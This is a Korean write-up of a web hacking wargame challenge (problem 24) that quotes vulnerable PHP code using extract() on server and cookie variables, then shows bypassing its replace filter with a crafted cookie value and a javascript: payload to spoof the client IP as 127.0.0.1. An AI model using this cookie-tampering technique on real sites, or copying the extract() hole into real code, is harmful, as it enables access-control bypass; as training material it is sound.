24번 문제 : 쿠키변조와 php구문(?)
24번에 접속하면 다음과 같이 뜬다. 클라이언트 아이피는 뭐 다 알겠지만 자신의 아이피 주소이다.
내 아이피 주소는 감춰두었다.
agent는 자신의 컴퓨터 환경 같아 보인다.
우클릭을 해서 소스보기를 하면
<?
extract($_SERVER);
extract($_COOKIE);
$ip=$REMOTE_ADDR;
$agent=$HTTP_USER_AGENT;
if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}
echo("<table border=1><tr><td>client ip</td><td>$ip</td></tr><tr><td>agent</td><td>$agent</td></tr></table>");
if($ip=="127.0.0.1")
{
@solve();
}
else
{
echo("<p><hr><center>Wrong IP!</center><hr>");
}
?>
이와 같이 나온다.
자신의 아이피주소를 "127.0.0.1"로 바꾸어서 전달하면 성공?!
$_COOKIE[REMOTE_ADDR] // 자신의 아이피 주소를 쿠키로 가져오는 php구문이다.
음 보자! 어떻게 하면 좋을까?!
$ip=str_replace("12","",$ip); // 12 -> ""
$ip=str_replace("7.","",$ip); // 7. -> ""
$ip=str_replace("0.","",$ip); // 0. -> ""
대체해서 값을 전달한다.
127.0.0.1 을 쿠키변조로 넘기면 1 값만 달랑 남게 된다.
112277..00..00..1 로 값을 넘기면 빨간 부분이 한 번만 필터되고 127.0.0.1 로 보내지게 된다.
주소창에 javascript:alert(document.cookie="REMOTE_ADDR=112277..00..00..1"); 입력
쿡시툴바를 이용하거나
파로스를 이용하여 쿠키를 넘겨주면 된다.
